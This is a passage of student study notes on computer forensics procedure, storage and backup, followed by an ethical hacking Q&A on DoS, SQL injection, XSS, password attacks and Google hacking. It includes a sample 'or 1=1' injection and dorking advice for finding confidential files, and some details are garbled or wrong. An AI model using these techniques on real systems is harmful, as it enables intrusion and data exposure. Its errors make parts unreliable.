  • 21. 21  Search files, file slack, and unallocated space for keywords.  Document file names, dates, and times.  Identify file, program, and storage anomalies.  Evaluate program functionality.  Document your findings.  Retain copies of software used. a. Shut down the computer: Depending on the computer operating system, this usually involves pulling the plug or shutting down a network computer using relevant commands required by the network involved. Generally, time is of the essence, and the computer system should be shut down as quickly as possible. b. Document the Hardware Configuration of the System: Before dismantling the computer, it is important that pictures are taken of the computer from all angles to document the system hardware components and how they are connected. Labeling each wire is also important, so that it can easily be reconnected when the system configuration is restored to its original condition at a secure location. c. Transport the Computer System to a Secure Location: a seized computer left unattended can easily be compromised. Don’t leave the computer unattended unless it is locked up in a secure location. d. Make bit stream backups of hard disks and floppy disks: All evidence processing should be done on a restored copy of the bit stream backup rather than on the original computer. Bit stream backups are much like an insurance policy and are essential for any serious computer evidence processing. e. Mathematically authenticate data on all storage devices: You want to be able to prove that you did not alter any of the evidence after the
  • 22. 22 computer came into your possession. Since 1989, law enforcement and military agencies have used a 32-bit mathematical process to do the authentication process. f. Document the system date and time: If the system clock is one hour slow because of daylight-savings time, then file timestamps will also reflect the wrong time. To adjust for these inaccuracies, documenting the system date and time settings at the time the computer is taken into evidence is essential. g. Make a list of key search words: It is all but impossible for a computer specialist to manually view and evaluate every file on a computer hard disk drive Gathering information from individuals familiar with the case to help compile a list of relevant keywords is important. Such keywords can be used in the search of all computer hard disk drives and floppy diskettes using automated software. h. Evaluate the Windows swap file: The Windows swap file is a potentially valuable source of evidence and leads. When the computer is turned off, the swap file is erased. But the content of the swap file can easily be captured and evaluated. i. Evaluate file slack: It is a source of significant security leakage and consists of raw memory dumps that occur during the work session as files are closed. File slack should be evaluated for relevant keywords to supplement the keywords identified in the previous steps. File slack is typically a good source of Internet leads. j. Evaluate unallocated space (erased files): Unallocated space should be evaluated for relevant keywords to supplement the keywords identified in the previous steps.
  • 23. 23 k. Search files, file slack, and unallocated space for keywords: The list of relevant keywords identified in the previous steps should be used to search all relevant computer hard disk drives and floppy diskettes. It is important to review the output of the text search utility and equally important to document relevant findings. l. Document file names, dates, and times: From an evidence standpoint, file names, creation dates, and last modified dates and times can be relevant. The output should be in the form of a word processing- compatible file that can be used to help document computer evidence issues tied to specific files. m.Identify file, program, and storage anomalies: Encrypted, compressed, and graphic files store data in binary format. As a result, text data stored in these file formats cannot be identified by a text search program. Manual evaluation of these files is required and, in the case of encrypted files, much work may be involved. n. Evaluate program functionality: Depending on the application software involved, running programs to learn their purpose may be necessary. When destructive processes that are tied to relevant evidence are discovered, this can be used to prove willfulness. o. Document your findings: it is important to document your findings as issues are identified and as evidence is found. Documenting all of the software used in your forensic evaluation of the evidence, including the version numbers of the programs used, is also important. p. Retain copies of software used: as part of your documentation process, it is recommended that a copy of the software used be included with the output of the forensic tool involved. Duplication of results can be
  • 24. 24 difficult or impossible to achieve if the software has been upgraded and the original version used was not retained. 5. How SAN (Storage Area Networks) makes a role in Computer Forensics? SANs are a relatively new methodology for attaching storage, whereby a separate network (separate from the traditional LAN) connects all storage and servers. This network would be a high-performance implementation, such as a fiber channel, that encapsulates protocols such as a small computer system interface (SCSI). These are more efficient at transferring data blocks from storage and have hardware implementations offering buffering and delivery guarantees. This is not available using TCP/IP. SANs promise the ability to make any-to-any connections among multiple servers and storage devices. They can create a shared “pool” of storage that can be accessed by multiple servers through multiple paths, resulting in higher availability— especially during a network disaster recovery (NDR). SANs also promise to simplify backup procedures. Tape subsystems could still be shared among numerous servers during backups—all transparent to the user. In other words, SANs allow distributed servers to access a large centralized storage subsystem for data-sharing applications during an NDR.  SAN Benefits: A SAN provides a perfect environment for clustering that can extend to dozens of servers and storage devices—all the while having redundant links in a fibre channel fabric. Servers will continue to function because their data is still available through the SAN, even if storage devices fail during an NDR.
  • 25. 25  Centralized Management: When a disk or controller fails in a direct-attached environment, redundant systems keep the redundant array of independent (or inexpensive) disks (RAID) array operating normally and generate an alarm. However, the redundant component may fail as well, bringing the system down if the failed component isn’t replaced quickly. ..  Scalability: A storage area network can lower acquisition and expansion costs, in addition to lowering management costs. Even as new servers, disk arrays, and tape subsystems are added, the SAN architecture supports access between all servers and all storage resources in the network. Without disrupting data access, customers can add storage resources and even servers online.  Reliability: A SAN is a network that resides between the host bus adapter and the storage device. This position inherently creates a critical point at the physical level, but by implementing multiple paths and redundant infrastructure devices, the SAN reduces or eliminates single points of failure.  Performance: In application environments that depend on bulk data transfer (such as data warehousing and data-mining applications), maximum bandwidth is of particular interest. Backup and restore times can be shortened dramatically by the high channel speed and low latency obtained by using a SAN.
  • 26. 26 6. What is data recovery? Explain the role of backup in data recovery? Data recovery is the process in which highly trained engineers evaluate and extract data from damaged media and return it in an intact format. Many people, even computer experts, fail to recognize data recovery as an option during a data crisis, yet it is possible to retrieve files that have been deleted and passwords that have been forgotten or to recover entire hard drives that have been physically damaged. The Role of Back-up in Data Recover Many factors affect back-up:  Storage costs are decreasing: The cost per megabyte of primary (online) storage has fallen dramatically over the past several years and continues to do so as disk drive technologies advance.  Systems have to be online continuously: Because systems must be continuously online, the dilemma becomes that you can no longer take files offline long enough to perform backup.
  • 27. 27  The role of backup has changed: The role of backup now includes the responsibility for recovering user errors and ensuring that good data has been saved and can quickly be restored. Conventional Tape Back-up Inn Today’s Market  A typical tape management system consists of a dedicated workstation with the front-end interfaced to the network and the backend controlling a repository of tape devices. The media server runs tape management software. It can administer backup devices throughout an enterprise and can run continuous parallel backups and restores.  An alternative to tape backup is to physically replicate or mirror all data and keep two copies online at all times. Because the cost of primary storage is falling, this is not as cost-prohibitive as it once was. The advantage is that the data does not have to be restored, so there are no issues with immediate data availability.  Network Back-up: Network backup creates network performance problems. Using the production network to carry backup data, as well as for normal user data access, can severely overburden today’s busy network resources.  Offline Backup: Offline backup affects data accessibility. Host processors must be quiescent during the backup. Backup is not host- independent, nor is it non disruptive to normal data access.  Live Backup: Live backups allow data access during the backup process but affect performance. Many database vendors offer live backup features. The downside to the live backup is that it puts a tremendous burden on the host.  Mirroring: Mirroring doesn’t protect against user error and replication of bad data. Fully replicated online data sounds great, albeit at twice the cost per megabyte of a single copy of online data. New Architectures and Techniques are required
  • 28. 28  Backup at extremely high speed, with host-processor independence of the underlying file structures supporting the data, is required. Recovery must be available at the file level. The time that systems are offline for back-up must be eliminated.  Remote hot recovery sites are needed for immediate resumption of data access. Backup of critical data is still required to ensure against data errors and user errors.  To achieve effective backup and recovery, the decoupling of data from its storage space is needed.  It is necessary to develop techniques to journal modified pages, so that journaling can be invoked within the primary storage device, without host intervention.  Part of the primary storage area must be set aside for data to be backed up. This area must be as large as the largest backup block (file, logical volume, etc.) 7. Explain the working of digital Evidences with example? Digital evidence is information stored or transmitted in binary form that may be relied on in court. It can be found on a computer hard drive, a mobile phone, among other place s. Digital evidence is commonly associated with electronic crime, or e-crime, such as child pornography or credit card fraud. However, digital evidence is now used to prosecute all types of crimes, not just e-crime. For example, suspects' e-mail or mobile phone files might contain critical evidence regarding their intent, their whereabouts at the time of a crime and their relationship with other suspects. In 2005, for example, a floppy disk led investigators to the BTK serial killer who had eluded police capture since 1974 and claimed the lives of at least 10 victims.
  • 29. 29 Ethical Hacking Part A 1. What are the phases of viruses? a. Dormant Phase: At this stage a viruses is in its ideal stage. It gets activated by some action or event such as date, time and presence of another program. b. Propagation Phase: In this phase virus generate its copies. c. Triggery Phase: This phase activate the virus to carry out the required function. d. Execution Phase: This phase virus performs actual function which may be harmless or destructive. 2. Explain SQL injection attacks? SQL injection is an attack where the hacker makes use of invalidated user input to enter arbitrary data or SQL commands; Malicious queries are constructed and when executed by the backend database it results in unwanted results. The attacker should have the knowledge of background database and he must make use of different strings to construct malicious queries to post them to the target. For example: SELECT item name, item description FROM item WHERE item no =999. (Normal query) SELECT item name, item description FROM item WHERE item no =999 or 1=1. (Injecting an existing query)
  • 30. 30 3. What is Foot printing? Foot printing is a part of reconnaissance process which is used for gathering possible information about target computer system in a network. Foot printing could be both passive and active. Example: Receiving a company’s website is a passive foot printing but attempting to gain access to sensitive information, during this phase the attacker can collect following information:  Domain name  IP address  Namespace 4. How Dos attack involves hacking? Dos attack used to denial legitimate uses access to a resource such as accessing a website network emails, etc. or making it extremely slow. This type of attack is usually implemented by hitting the target resource such as web server with too many parameters or request at same time. This result in the server is failing to respond to the entire request. The effect of this can either be crashing the server of slowing them down. 5. Write a short note on spoofing? A spoofing attack happens when a malicious party successfully impersonates another user or device. Attackers typically use spoofing to gain unauthorized access to a system or to sensitive information. Spoofing attacks may also be used to launch attacks against other
  • 31. 31 network host or to spread malware software. There are several major types of spoofing, including:  IP address spoofing  ARP spoofing  DNS server spoofing  Email spoofing 6. What is Batch file programming? Batch file programming is a computer to do things simply by creating a bath file you can write in a single notepad and execute as a single file. How to write a batch file? Step1. Open your text editor. Batch file programming is really about writing commands. . Notepad, WordPad, etc. are some text editor. Step2: Begin writing code. The code is essentially same as what you write in the command prompt. Few commands are follows: i. Ipconfig: This present’s network information like Mac address. ii. Start [website]: This opens a specified website in your browser. iii. Rem: This is used if you want to make commands or remark in your code. iv. Pause: It is the script so; it can be read before it continuous. v. Echo: This command will display text in the command prompt. vi. %%a: This command refers to every file in a given folder.
  • 32. 32 Part B 1. Explain Google Hacking Methods with example? Google Hacking is the method to access information that’s publicly available, but not intended for public distribution. Using certain intelligent search techniques, one can land unexpected results on Google search page. Google hacking involves using publicly available search engines to access publicly available information that almost certainly was not intended for public distribution. The information accessed using Google Hacking:  Personal and financial info.  User ID, computer account logins, passwords.  Private, or proprietary company data.  Sensitive government information.  Flaws in websites and servers. Common Google Hacking techniques: Search using file types, keyword, and site type: Many websites and organizations store their financial, personnel, etc., data in Microsoft Excel format. So, here’s how you need to look for some sensitive information of a South African company. Don’t forget to include keywords like Confidential, Budget etc. Use stock words and phrases: Along with file types like Excel, Word, or PowerPoint, you are also advised to use stock words and phrases like do not distribute, confidential, proprietary, not for distribution, e
  • 33. 33 Misconfigured web servers: Very often Google contains directories that are not intended to be on the web. In Google Hacking, these servers provide a rich set of information. Numrange search: NSA describes Numrange search as one of the “scariest searches available through Google. It uses 2 number separated by 2 dots and no spaces. A user can use it with search keywords and other search options. 2. Explain any four port scanning methods? Ping Scan: The simplest port scans are ping scans. A ping is an Internet Control Message Protocol (ICMP) echo request – you are looking for any ICMP replies, which indicates that the target is alive. A ping scan is an automated blast of many ICMP echo requests to different targets to see who responds. Administrators usually disable ping either on the firewall or on the router. It’s quick and easy to turn off this functionality and make it impossible to scout the network this way. However, ping is a good troubleshooting tool, and turning it off makes tracking down network problems a little more difficult. TCP Connect: This port scanning technique is basically the same as the TCP Half-Open scan, but instead of leaving the target hanging, the port scanner completes the TCP connection. It’s not as popular a technique as the TCP Half-Open. First, you have to send one more packet per scan, which increases the amount of noise you are
  • 34. 34 making on the network. Second, since you complete the connection with the target, you might trip an alarm that the Half-Open scan wouldn’t. UDP: UDP is the other half of our “hallway” and some standard services – DNS, SNMP, DHCP for example – use UDP ports instead of TCP ports. When you run a UDP port scan, you send either an empty packet or a packet that has a different payload per port, depending on your use case. SYN: Any SYN-ACK responses are possible connections: an RST (reset) response means the port is closed, but there is a live computer here. No responses indicate SYN is filtered on the network. Any SYN-ACK replies are a quick way cybercriminal can find the next potential target. 3. Discuss in detail any four DOS attack techniques? a. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as a Mac limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash. b. Smurf attack: This type of attack uses large amount of Internet Control Message Protocol (ICMP). Ping traffic target at an internet broadcast address. The replay IP address is spoofed to that the intended victim. Since a single internet broadcast address can support a maximum of 255 hosts. A Smurf attack amplifies a sing ping 255times. The effect of this is slowing down the network.
  • 35. 35 Smurf attack is an attack in which malicious user utilizes the broadcast address of vulnerable network by sending spoofed packets, resulting in the flooding of the targeted IP address. c. Buffer Overflow: A buffer gives a temporal storage location in RAM. That is; used to hold data so that the CPU can manipulate it before writing it back to the disk. Buffers are a size limit. This type of attack loads the buffer with more data that it can hold. This causes the buffer to overflow and corrupt the data it holds. Example: - Email sending with the file name that has 256 character. d. SYN attack: SYN is a short form of Synchronize. This type of data takes advantage of three way handshake to establish communication using TCP. SYN attack works by flooding the victim with incomplete SYN messages. This causes the victim machine to allocate memory resources that are never used and deny access to legitimate users. 4. Write down any four types of attacks? a. SQL Injection attack: SQL injection is an attack where the hacker makes use of invalidated user input to enter arbitrary data or SQL commands; malicious queries are constructed and when executed by the backend database it results in unwanted results. The attacker should have the knowledge of background database and he must make use of different strings to construct malicious queries to post them to the target.
  • 36. 36 For example: SELECT item name, item description FROM item WHERE item no =999. (Normal query) SELECT item name, item description FROM item WHERE item no =999 or 1=1. (Injecting an existing query) The types of attacks are as follows:  Error based SQL injection  Union based SQL injection  Blind SQL injection b. Dos attack(Denial of service): Dos attack used to denial legitimate uses access to a resource such as accessing a website network emails, etc. or making it extremely slow. This type of attack is usually implemented by hitting the target resource such as web server with too many parameters or request at same time. This result in the server is failing to respond to the entire request. The effect of this can either be crashing the server of slowing them down.  Flooding attack  Ping of death  Smurf attack  Buffer Overflow. c. Sniffing: Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. Sniffers are used by networks /system administrator to monitor and troubleshoot network traffic.
  • 37. 37 Attackers use sniffer to capture data packets containing sensitive information such as password, account information etc. Sniffers can be hardware or software installed in the system. Types of Sniffing:  Active Sniffing: This is the process of sniffing through the switch. A sniffing is a point to point network device. The Switch regulates the flow of data between its ports by actively monitoring the Mac address on each.  Passive Sniffing: This is the process of sniffing through the hub. Any traffic that is passing through the non-switched pr unabridged network segment can be seen by all the machines on the segment. d. Password attack: One should always take care to have strong password to defend their accounts from potential hackers. A strong password has a following attributes:  Contains at least 8 characters.  A mix of letter, number and special character.  A combination of following attributes: i. Small and capital letter.  Dictionary attack: In this attack, the attacker uses a predefined list of words from dictionary and guesses the password. If the set password is weak then a dictionary attack can decode fast.
  • 38. 38  Hybrid dictionary attack: It uses a set of dictionary words, combined with extensions. Crunch is a word list generator where you can specific a standard character set.  Brute force attack: In brute force attack, the hacker uses all possible combination of letters, numbers, special characters and small and capital letter to break password. 5. Examine different forms of privacy attacks? Here the attacker uses various automated tools which are freely available on the internet. Some of the examples are follows: a. Trojan: Trojan is a RAT [Remote Administration Tool] which enable attacker to execute various software and hardware instructions in the target system. Two parts are there: i. Sever port: It has to been installed on the victim’s computer. ii. Client part: It is installed on attackers system this part gives complete controller over target computer. b. Key logger: They are the tools which enable attacker to record all the key strokes made by victim and send its log secretly to the attacker mails which is previously set by him. c. Spyware: Spyware utility is the malicious program that spy on the activities of the victim and pass the recorded information to the without the victims consent. Most spyware activities monitor and record the victim’s internet using habit.
  • 39. 39 Typically a spyware tool is in a host.exe file or a utility file. If a victim download and execute an infected .exe file. Then spyware become active on the victim system. d. Sniffers: Sniffers are originally developed as a tool for debugging or troubleshooting as a network problem. The Ethernet based sniffer works with sniffer based data card to capture and safe the data packets send across the network. Sniffer can turn out to be quiet dangerous if an another manage to install a sniffer on your system or the router of the network, all the information including password, company business, etc. will lost. 6. Explain Input validation attacks in detail? Input validation attack is any malicious against a computer system that involves manually entering strange information into a normal user input field. Input validation attack takes place when an attacker purposefully enters information into a system or application with the intension of break system functionality. Types of input validation attack:  Buffer Overflow Attack: It sends too much information for a system to process. Network or computer stop responding and access information to tack a memory. Example: Stack Overflow, format string overflow  Canonicalization: It takes place when someone change file directory path. This attacks targets pages that use template files or referencing alternate files on web server. The basic form of this attack is to move
  • 40. 40 outside of web document rules. In order to access the system file, this type of functionality is accident from URL and is not limited to any one programming language or web server. Changing a file directory path, that is a digital permission access to parts of a computer in order to allow access to malicious path is to steel sensitive information or make unapproved changes.  Cross site Scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website which contains a valid URL with a dangerous script embedded an unsuspective visitor might trust they are on and the user is not having an idea side contains a malicious activity. 7. Analyze different DDoS Attack types? A Distributed Denial of Service (DDoS) attack is an attempt to make an online service or a website unavailable by overloading it with huge floods of traffic generated from multiple sources. DDoS attacks can be broadly categorized into three categories:  Volume-based Attacks  Protocol Attacks  Application Layer Attacks a. Volume-based Attacks: Volume-based attacks include TCP floods, UDP floods, ICMP floods, and other spoofed packet floods. These are also called Layer 3 & 4 Attacks. Here, an attacker tries to saturate the bandwidth of the target site. The attack magnitude is measured in Bits per Second (bps). i. UDP Flood: A UDP flood is used to flood random ports on a remote host with numerous UDP packets, more specifically port
  • 41. 41 number 53. Specialized firewalls can be used to filter out or block malicious UDP packets. ii. ICMP Flood: This is similar to UDP flood and used to flood a remote host with numerous ICMP Echo Requests. This type of attack can consume both outgoing and incoming bandwidth and a high volume of ping requests will result in overall system slowdown. iii. HTTP Flood: The attacker sends HTTP GET and POST requests to a targeted web server in a large volume which cannot be handled by the server and leads to denial of additional connections from legitimate clients. iv. Amplification Attack: The attacker makes a request that generates a large response which includes DNS requests for large TXT records and HTTP GET requests for large files like images, PDFs, or any other data files. b. Protocol Attacks: Protocol attacks include SYN floods, Ping of Death, fragmented packet attacks, Smurf DDoS, etc. This type of attack consumes actual server resources and other resources like firewalls and load balancers. The attack magnitude is measured in Packets per Second. i. DNS flood: DNS floods are used for attacking both the infrastructure and a DNS application to overwhelm a target system and consume all its available network bandwidth. ii. SYN Flood: The attacker sends TCP connection requests faster than the targeted machine can process them, causing network saturation. Administrators can tweak TCP stacks to mitigate the effect of SYN floods.
  • 42. 42 iii. Ping of death: The ping command is usually used to test the availability of a network resource. It works by sending small data packets to the network resource. The TCP/IP protocol allows 65,536 bytes as a Mac limit in the server. Since the data packets are larger than the server can handle, the server can freeze, reboot or crash. c. Application Layer Attacks: Application Layer Attacks include Slowworms, Zero-day Dodos attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Here the goal is to crash the web server. The attack magnitude is measured in Requests per Second. i. Application Attack: This is also called Layer 7 Attack, where the attacker makes excessive log-in, database-lookup, or search requests to overload the application. It is really difficult to detect Layer 7 attacks because they resemble legitimate website traffic. ii. NTP Amplification: The attacker exploits publically-accessible Network Time Protocol (NTP) servers to overwhelm the targeted server with User Datagram Protocol (UDP) traffic. 8. How ‘crunch’ and ‘Hydra’ related to ethical hacking? Hydra has a very complex syntax for attacking web applications. So, let's just go and see the syntax first. This is the program which we are using to launch the attack. Hydra comes pre-installed in all versions of kali. So, you don’t need to do anything fancy. Just launch it from the command line by typing hydra.
  • 43. 43 Crunch is a wordlist generator where you can specify a standard character set or a character set. Crunch can generate all possible combinations and permutations. This tool comes bundled with the Kali distribution of Linux. 9. What is ‘XSS’? Cross site Scripting (XSS): This attack involves placing a malicious link in a proper place in a normal website which contains a valid URL with a dangerous script embedded an unsuspective visitor might trust they are on and the user is not having an idea side contains a malicious activity. In other words, XSS enables attackers to inject client-side scripts into web pages by exploiting vulnerabilities in dynamically generated web pages. An attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application and cause various damages including data theft, session hijacking, redirecting the web page to another website, etc. XSS attack is always to execute malicious JavaScript in the victim's browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:  Persistent XSS, where the malicious string originates from the website's database.  Reflected XSS, where the malicious string originates from the victim's request.  DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
  • 44. 44  Reflected XSS: Here the attacker will send a script as an input, and the attacker's contents will be reflected back to the victim. He can craft malicious scripts to get session cookies, redirect to a malicious web page, inject data, execute system commands and much more. Stored XSS: This attack can be considered riskier and it provides more damage. In this type of attack, the malicious code or script is being saved on the web server (for example, in the database) and executed every time when the users will call the appropriate functionality. This way stored XSS attack can affect many users. Also as the script is being stored on the web server, it will affect the website for a longer time. DOM-based XXS: This type of attack occurs when the DOM environment is being changed, but the client-side code does not change. When the DOM environment is being modified in the victim’s browser, then the client side code executes differently. 10. Explain the methods of password hacking? One should always take care to have strong password to defend their accounts from potential hackers. A strong password has a following attributes:  Contains at least 8 characters.
  • 45. 45  A mix of letter, number and special character.  A combination of following attributes: I. Small and capital letter.  Dictionary attack: In this attack, the attacker uses a predefined list of words from dictionary and guesses the password. If the set password is weak then a dictionary attack can decode fast.  Hybrid dictionary attack: It uses a set of dictionary words, combined with extensions. Crunch is a word list generator where you can specific a standard character set. Crunch can generate all possible combinations and permutation of words.  Brute force attack: In brute force attack, the hacker uses all possible combination of letters, numbers, special characters and small and capital letter to break password. This type of attack has a high probability of success but it requires an AENORMOUS time to process all the combinations.  Phishing Attack: There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log in page associated with whatever service it is the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go use it for their own purpose.
  • 46. 46